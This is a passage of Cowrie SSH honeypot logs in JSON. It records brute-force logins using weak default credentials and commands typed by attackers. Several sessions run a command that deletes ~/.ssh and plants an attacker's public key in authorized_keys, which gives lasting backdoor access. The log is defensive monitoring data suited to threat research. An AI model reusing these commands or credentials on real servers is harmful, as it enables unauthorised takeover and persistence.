":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:35:44.358767Z","src_ip":"212.227.235.229","session":"0e0fdfc4ed74"}
{"eventid":"cowrie.login.failed","username":"developer","password":"abc123","message":"login attempt [developer/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:35:49.461685Z","src_ip":"212.227.235.229","session":"0e0fdfc4ed74"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:51.567187Z","src_ip":"212.227.235.229","session":"0e0fdfc4ed74"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":59458,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e437cded2dc","protocol":"ssh","message":"New connection: 82.67.125.95:59458 (1.2.3.4:22) [session: 8e437cded2dc]","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.506853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.507540Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.543802Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin1234@","message":"login attempt [root/Admin1234@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.730128Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:36:02.818825Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.820009Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.821210Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.858418Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:36:02.987818Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:36:02.988511Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:36:03.027976Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:03.028903Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":59474,"dst_ip":"1.2.3.4","dst_port":22,"session":"f054d5ef9d99","protocol":"ssh","message":"New connection: 82.67.125.95:59474 (1.2.3.4:22) [session: f054d5ef9d99]","sensor":"my-vps","timestamp":"2025-08-31T01:36:03.062925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:03.063808Z","src_ip":"82.67.125.95","session":"f054d5ef9d99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:36:03.099792Z","src_ip":"82.67.125.95","session":"f054d5ef9d99"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:36:03.286311Z","src_ip":"82.67.125.95","session":"f054d5ef9d99"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.326182Z","src_ip":"82.67.125.95","session":"f054d5ef9d99"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":59488,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b071782f5af","protocol":"ssh","message":"New connection: 82.67.125.95:59488 (1.2.3.4:22) [session: 9b071782f5af]","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.361118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.361756Z","src_ip":"82.67.125.95","session":"9b071782f5af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.397982Z","src_ip":"82.67.125.95","session":"9b071782f5af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.583355Z","src_ip":"82.67.125.95","session":"9b071782f5af"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.620541Z","src_ip":"82.67.125.95","session":"8e437cded2dc"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:04.621654Z","src_ip":"82.67.125.95","session":"9b071782f5af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43128,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4b50d271569","protocol":"ssh","message":"New connection: 212.227.125.160:43128 (1.2.3.4:22) [session: a4b50d271569]","sensor":"my-vps","timestamp":"2025-08-31T01:36:05.520388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:36:06.008623Z","src_ip":"212.227.125.160","session":"a4b50d271569"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:36:06.009457Z","src_ip":"212.227.125.160","session":"a4b50d271569"}
{"eventid":"cowrie.login.failed","username":"developer","password":"abc123","message":"login attempt [developer/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:36:08.576106Z","src_ip":"212.227.125.160","session":"a4b50d271569"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:10.027831Z","src_ip":"212.227.125.160","session":"a4b50d271569"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1157,"dst_ip":"1.2.3.4","dst_port":22,"session":"a333b48741ca","protocol":"ssh","message":"New connection: 102.88.137.80:1157 (1.2.3.4:22) [session: a333b48741ca]","sensor":"my-vps","timestamp":"2025-08-31T01:36:36.613240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:36.623596Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:36:36.745498Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.login.success","username":"root","password":"01230123","message":"login attempt [root/01230123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:36:37.235455Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:36:37.918634Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:36:37.919336Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:36:37.920459Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.044779Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:36:38.310900Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.311617Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.436421Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.437316Z","src_ip":"102.88.137.80","session":"a333b48741ca"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33631,"dst_ip":"1.2.3.4","dst_port":22,"session":"07ed9fc35a8f","protocol":"ssh","message":"New connection: 102.88.137.80:33631 (1.2.3.4:22) [session: 07ed9fc35a8f]","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.572358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.573390Z","src_ip":"102.88.137.80","session":"07ed9fc35a8f"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:36:38.702895Z","src_ip":"102.88.137.80","session":"07ed9fc35a8f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:36:39.265121Z","src_ip":"102.88.137.80","session":"07ed9fc35a8f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:36:40.397080Z","src_ip":"102.88.137.80","session":"07ed9fc35a8f"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1158,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4717d3cbd9d","protocol":"ssh","message":"New connection: 102.88.137.80:1158 (1.2.3.4:22) [session: a4717d3cbd9d]","sensor":"my-vps","timestamp":"2025-08-31T01:36:40.511826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:36:40.512675Z","src_ip":"102.88.137.80","session":"a4717d3cbd9d"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-s